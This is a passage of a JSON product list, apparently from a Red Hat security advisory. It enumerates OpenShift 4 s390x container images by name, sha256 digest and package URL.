"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:c471ff51606f3c56eb399d1b04bb035d97d6e81c470d2971c16371aba9a6d260_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:c471ff51606f3c56eb399d1b04bb035d97d6e81c470d2971c16371aba9a6d260_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:c471ff51606f3c56eb399d1b04bb035d97d6e81c470d2971c16371aba9a6d260_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cluster-api-controllers-rhel9@sha256%3Ac471ff51606f3c56eb399d1b04bb035d97d6e81c470d2971c16371aba9a6d260?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846004"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:3f53284ee9720572b864ab12a87dfb98736e26dfd34e87f3967ec4800bc06b62_s390x",
"product": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:3f53284ee9720572b864ab12a87dfb98736e26dfd34e87f3967ec4800bc06b62_s390x",
"product_id": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:3f53284ee9720572b864ab12a87dfb98736e26dfd34e87f3967ec4800bc06b62_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openstack-resource-controller-rhel9@sha256%3A3f53284ee9720572b864ab12a87dfb98736e26dfd34e87f3967ec4800bc06b62?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848327"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:83cd8f29cb94e04be62a3eebeb0b5134ab867e77cc629f6df5996f015691698b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:83cd8f29cb94e04be62a3eebeb0b5134ab867e77cc629f6df5996f015691698b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:83cd8f29cb94e04be62a3eebeb0b5134ab867e77cc629f6df5996f015691698b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-lifecycle-manager-rhel9@sha256%3A83cd8f29cb94e04be62a3eebeb0b5134ab867e77cc629f6df5996f015691698b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848580"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5d8e93e5f498d9d364e8b50c6f6c5c70d1ac9f1506b99629ff185abf6b28d608_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5d8e93e5f498d9d364e8b50c6f6c5c70d1ac9f1506b99629ff185abf6b28d608_s390x",
"product_id": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5d8e93e5f498d9d364e8b50c6f6c5c70d1ac9f1506b99629ff185abf6b28d608_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-registry-rhel9@sha256%3A5d8e93e5f498d9d364e8b50c6f6c5c70d1ac9f1506b99629ff185abf6b28d608?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:6f0132e14e165e5d59ab20bb4e869d068aa8954e5aeae47c29cb84cc370b2b0a_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:6f0132e14e165e5d59ab20bb4e869d068aa8954e5aeae47c29cb84cc370b2b0a_s390x",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:6f0132e14e165e5d59ab20bb4e869d068aa8954e5aeae47c29cb84cc370b2b0a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-csr-approver-rhel9@sha256%3A6f0132e14e165e5d59ab20bb4e869d068aa8954e5aeae47c29cb84cc370b2b0a?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849682"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:c4d2014bca6fbda58a4797f0f2d5732efc3692a609899ba8ca063afd1103fd77_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:c4d2014bca6fbda58a4797f0f2d5732efc3692a609899ba8ca063afd1103fd77_s390x",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:c4d2014bca6fbda58a4797f0f2d5732efc3692a609899ba8ca063afd1103fd77_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-node-agent-rhel9@sha256%3Ac4d2014bca6fbda58a4797f0f2d5732efc3692a609899ba8ca063afd1103fd77?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848754"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:229041be25597926b6cba147a685e9025f1fd38aaccd3ada69f6f08a36a1c3d5_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:229041be25597926b6cba147a685e9025f1fd38aaccd3ada69f6f08a36a1c3d5_s390x",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:229041be25597926b6cba147a685e9025f1fd38aaccd3ada69f6f08a36a1c3d5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-orchestrator-rhel9@sha256%3A229041be25597926b6cba147a685e9025f1fd38aaccd3ada69f6f08a36a1c3d5?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848221"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:49dbeb17cd5787537cb5e30dd5d2c7adcf720346613c28004d292a5a554a4fa7_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:49dbeb17cd5787537cb5e30dd5d2c7adcf720346613c28004d292a5a554a4fa7_s390x",
"product_id": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:49dbeb17cd5787537cb5e30dd5d2c7adcf720346613c28004d292a5a554a4fa7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-apiserver-network-proxy-rhel9@sha256%3A49dbeb17cd5787537cb5e30dd5d2c7adcf720346613c28004d292a5a554a4fa7?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844475"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:cf354f87320a3b730ade16800a31fd18edd643aa6b652d0249f6f531db8932ad_s390x",
"product": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:cf354f87320a3b730ade16800a31fd18edd643aa6b652d0249f6f531db8932ad_s390x",
"product_id": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:cf354f87320a3b730ade16800a31fd18edd643aa6b652d0249f6f531db8932ad_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-service-rhel9-operator@sha256%3Acf354f87320a3b730ade16800a31fd18edd643aa6b652d0249f6f531db8932ad?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847491"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:7a6604dbc334622a976776e7725e4eba7ba4e8872a87f49bbb1c6f334b2f6c95_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:7a6604dbc334622a976776e7725e4eba7ba4e8872a87f49bbb1c6f334b2f6c95_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:7a6604dbc334622a976776e7725e4eba7ba4e8872a87f49bbb1c6f334b2f6c95_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-cluster-api-controllers-rhel9@sha256%3A7a6604dbc334622a976776e7725e4eba7ba4e8872a87f49bbb1c6f334b2f6c95?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849192"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5c1172fb42f1b34b67f5e2044bb190849bacaf5eebabdafdc82d0a7f1c1a7d84_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5c1172fb42f1b34b67f5e2044bb190849bacaf5eebabdafdc82d0a7f1c1a7d84_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5c1172fb42f1b34b67f5e2044bb190849bacaf5eebabdafdc82d0a7f1c1a7d84_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-installer-rhel9@sha256%3A5c1172fb42f1b34b67f5e2044bb190849bacaf5eebabdafdc82d0a7f1c1a7d84?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773855356"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:42c14c3b43aa86ab4a94d86b737ce7eea32703c70db0a5f0e9ac13f9a8f385cf_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:42c14c3b43aa86ab4a94d86b737ce7eea32703c70db0a5f0e9ac13f9a8f385cf_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:42c14c3b43aa86ab4a94d86b737ce7eea32703c70db0a5f0e9ac13f9a8f385cf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-rhel9-operator@sha256%3A42c14c3b43aa86ab4a94d86b737ce7eea32703c70db0a5f0e9ac13f9a8f385cf?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848328"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:6427135ca011b5cc6539000ab9d3bd9e2d68c7703d1e50423d01a88d8ed90fc6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:6427135ca011b5cc6539000ab9d3bd9e2d68c7703d1e50423d01a88d8ed90fc6_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:6427135ca011b5cc6539000ab9d3bd9e2d68c7703d1e50423d01a88d8ed90fc6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-artifacts-rhel9@sha256%3A6427135ca011b5cc6539000ab9d3bd9e2d68c7703d1e50423d01a88d8ed90fc6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773851099"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:d0c4572792d7337fe9ce11cdd9000ebc8d86b345bc7e8dcb6b2718ad3439c6fe_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:d0c4572792d7337fe9ce11cdd9000ebc8d86b345bc7e8dcb6b2718ad3439c6fe_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:d0c4572792d7337fe9ce11cdd9000ebc8d86b345bc7e8dcb6b2718ad3439c6fe_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cloud-credential-rhel9-operator@sha256%3Ad0c4572792d7337fe9ce11cdd9000ebc8d86b345bc7e8dcb6b2718ad3439c6fe?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846707"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2131f098ee848c2a4190c1fea7410df1e465efd7bec4e62b36df7cfce07872ac_s390x",
"product": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2131f098ee848c2a4190c1fea7410df1e465efd7bec4e62b36df7cfce07872ac_s390x",
"product_id": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2131f098ee848c2a4190c1fea7410df1e465efd7bec4e62b36df7cfce07872ac_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/cloud-network-config-controller-rhel9@sha256%3A2131f098ee848c2a4190c1fea7410df1e465efd7bec4e62b36df7cfce07872ac?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846745"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:1746abd22482e0307a612a4832326e681ecb67358723df137b076bf13dbe638d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:1746abd22482e0307a612a4832326e681ecb67358723df137b076bf13dbe638d_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:1746abd22482e0307a612a4832326e681ecb67358723df137b076bf13dbe638d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-api-rhel9@sha256%3A1746abd22482e0307a612a4832326e681ecb67358723df137b076bf13dbe638d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848551"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:6a19d1ab1ae1c3a8cd270e3b90ba8631d8342688f9111e7eb05d6d5e7b9c7e0e_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:6a19d1ab1ae1c3a8cd270e3b90ba8631d8342688f9111e7eb05d6d5e7b9c7e0e_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:6a19d1ab1ae1c3a8cd270e3b90ba8631d8342688f9111e7eb05d6d5e7b9c7e0e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-authentication-rhel9-operator@sha256%3A6a19d1ab1ae1c3a8cd270e3b90ba8631d8342688f9111e7eb05d6d5e7b9c7e0e?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845520"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:92f8b02f0ea036b3630d44820aefc84c9853f218fc679b9750c088cc4f07c1af_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:92f8b02f0ea036b3630d44820aefc84c9853f218fc679b9750c088cc4f07c1af_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:92f8b02f0ea036b3630d44820aefc84c9853f218fc679b9750c088cc4f07c1af_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9-operator@sha256%3A92f8b02f0ea036b3630d44820aefc84c9853f218fc679b9750c088cc4f07c1af?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773612481"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9463ca409614b7d8fe425b0792a1faa34cf43d3397dbf00ddf05b13997cd8ba6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9463ca409614b7d8fe425b0792a1faa34cf43d3397dbf00ddf05b13997cd8ba6_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9463ca409614b7d8fe425b0792a1faa34cf43d3397dbf00ddf05b13997cd8ba6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-baremetal-operator-rhel9@sha256%3A9463ca409614b7d8fe425b0792a1faa34cf43d3397dbf00ddf05b13997cd8ba6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844989"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:959c043c98f9c69d091fa1ff171360b2cf40e829becdc967f5b314e66ccf9fde_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:959c043c98f9c69d091fa1ff171360b2cf40e829becdc967f5b314e66ccf9fde_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:959c043c98f9c69d091fa1ff171360b2cf40e829becdc967f5b314e66ccf9fde_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-bootstrap-rhel9@sha256%3A959c043c98f9c69d091fa1ff171360b2cf40e829becdc967f5b314e66ccf9fde?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847672"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:ba11e45b58a6c4940f40f11c0d47129571103de5883d4ccf22b6ba5b9ccdb9b4_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:ba11e45b58a6c4940f40f11c0d47129571103de5883d4ccf22b6ba5b9ccdb9b4_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:ba11e45b58a6c4940f40f11c0d47129571103de5883d4ccf22b6ba5b9ccdb9b4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-capi-rhel9-operator@sha256%3Aba11e45b58a6c4940f40f11c0d47129571103de5883d4ccf22b6ba5b9ccdb9b4?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848529"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:414f0b86c4940ad7a5ca443bf04ff8293f93804d8b69688382e177afa1459394_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:414f0b86c4940ad7a5ca443bf04ff8293f93804d8b69688382e177afa1459394_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:414f0b86c4940ad7a5ca443bf04ff8293f93804d8b69688382e177afa1459394_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-cloud-controller-manager-rhel9-operator@sha256%3A414f0b86c4940ad7a5ca443bf04ff8293f93804d8b69688382e177afa1459394?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:1a22a625e67c26e4db67b97a3e08fe63a1ed931e419b732fb186567ab5c2edd7_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:1a22a625e67c26e4db67b97a3e08fe63a1ed931e419b732fb186567ab5c2edd7_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:1a22a625e67c26e4db67b97a3e08fe63a1ed931e419b732fb186567ab5c2edd7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-api-rhel9@sha256%3A1a22a625e67c26e4db67b97a3e08fe63a1ed931e419b732fb186567ab5c2edd7?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845449"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:b3747aca163af2713256a975222f6dac10692a5b99ef948bb8e4471532e4e484_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:b3747aca163af2713256a975222f6dac10692a5b99ef948bb8e4471532e4e484_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:b3747aca163af2713256a975222f6dac10692a5b99ef948bb8e4471532e4e484_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-rhel9-operator@sha256%3Ab3747aca163af2713256a975222f6dac10692a5b99ef948bb8e4471532e4e484?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848648"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b24d5a179400093a2a61b87f3c0dbd8d1f1f91e8fcb288e18f87ef5fe8bd6a4c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b24d5a179400093a2a61b87f3c0dbd8d1f1f91e8fcb288e18f87ef5fe8bd6a4c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b24d5a179400093a2a61b87f3c0dbd8d1f1f91e8fcb288e18f87ef5fe8bd6a4c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-control-plane-machine-set-rhel9-operator@sha256%3Ab24d5a179400093a2a61b87f3c0dbd8d1f1f91e8fcb288e18f87ef5fe8bd6a4c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847476"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:1782aa4b09b78512885d81c529588737d738cf29def3ff2542e74fd02d256cf2_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:1782aa4b09b78512885d81c529588737d738cf29def3ff2542e74fd02d256cf2_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:1782aa4b09b78512885d81c529588737d738cf29def3ff2542e74fd02d256cf2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256%3A1782aa4b09b78512885d81c529588737d738cf29def3ff2542e74fd02d256cf2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844474"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:bfc8fbbd5e342e4e801d576913b0a6a9c41150c0a091eb43d0886a18f3a22f17_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:bfc8fbbd5e342e4e801d576913b0a6a9c41150c0a091eb43d0886a18f3a22f17_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:bfc8fbbd5e342e4e801d576913b0a6a9c41150c0a091eb43d0886a18f3a22f17_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-dns-rhel9-operator@sha256%3Abfc8fbbd5e342e4e801d576913b0a6a9c41150c0a091eb43d0886a18f3a22f17?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849293"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:33b125caf8101d10e87c75d960666659dc64ecb8c9cc15c39049f82b174a2b03_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:33b125caf8101d10e87c75d960666659dc64ecb8c9cc15c39049f82b174a2b03_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:33b125caf8101d10e87c75d960666659dc64ecb8c9cc15c39049f82b174a2b03_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-image-registry-rhel9-operator@sha256%3A33b125caf8101d10e87c75d960666659dc64ecb8c9cc15c39049f82b174a2b03?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846870"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:ad3637958bf538933748f6a7bf3512bf18d01a4082e308dfd7a451639601b320_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:ad3637958bf538933748f6a7bf3512bf18d01a4082e308dfd7a451639601b320_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:ad3637958bf538933748f6a7bf3512bf18d01a4082e308dfd7a451639601b320_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-snapshot-controller-rhel9@sha256%3Aad3637958bf538933748f6a7bf3512bf18d01a4082e308dfd7a451639601b320?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848645"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:16ebabf0329c1fa4104b3f3d244c3b3e54ff6b7f747b092b66e3ef2b4d79216f_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:16ebabf0329c1fa4104b3f3d244c3b3e54ff6b7f747b092b66e3ef2b4d79216f_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:16ebabf0329c1fa4104b3f3d244c3b3e54ff6b7f747b092b66e3ef2b4d79216f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-ingress-rhel9-operator@sha256%3A16ebabf0329c1fa4104b3f3d244c3b3e54ff6b7f747b092b66e3ef2b4d79216f?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845267"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:b39be2a08e43aef9897cc7a3d411d9ad6b8037cfed852e916e57d0346ac7e675_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:b39be2a08e43aef9897cc7a3d411d9ad6b8037cfed852e916e57d0346ac7e675_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:b39be2a08e43aef9897cc7a3d411d9ad6b8037cfed852e916e57d0346ac7e675_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-apiserver-rhel9-operator@sha256%3Ab39be2a08e43aef9897cc7a3d411d9ad6b8037cfed852e916e57d0346ac7e675?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845950"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:70f1339b43a7a2ffa55e8128782dbf02308e74e7f3b71e93e498a8fc841bae68_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:70f1339b43a7a2ffa55e8128782dbf02308e74e7f3b71e93e498a8fc841bae68_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:70f1339b43a7a2ffa55e8128782dbf02308e74e7f3b71e93e498a8fc841bae68_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-controller-manager-rhel9-operator@sha256%3A70f1339b43a7a2ffa55e8128782dbf02308e74e7f3b71e93e498a8fc841bae68?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848026"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:841b26747f8ecaf1056d4737bd1c3f3646d6879ed8a01f28093325e4945c2a2b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:841b26747f8ecaf1056d4737bd1c3f3646d6879ed8a01f28093325e4945c2a2b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:841b26747f8ecaf1056d4737bd1c3f3646d6879ed8a01f28093325e4945c2a2b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-scheduler-rhel9-operator@sha256%3A841b26747f8ecaf1056d4737bd1c3f3646d6879ed8a01f28093325e4945c2a2b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844497"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:84672d5c16e192f5b5919577cbef7098cc4d19be1af37d2a40dce1a162e7dce7_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:84672d5c16e192f5b5919577cbef7098cc4d19be1af37d2a40dce1a162e7dce7_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:84672d5c16e192f5b5919577cbef7098cc4d19be1af37d2a40dce1a162e7dce7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256%3A84672d5c16e192f5b5919577cbef7098cc4d19be1af37d2a40dce1a162e7dce7?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846260"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:63a534489c093862945a6215eca0dcae4f7e738414d8840a7962d4604d6dcdb3_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:63a534489c093862945a6215eca0dcae4f7e738414d8840a7962d4604d6dcdb3_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:63a534489c093862945a6215eca0dcae4f7e738414d8840a7962d4604d6dcdb3_s390x",
"product_identification_helper": {
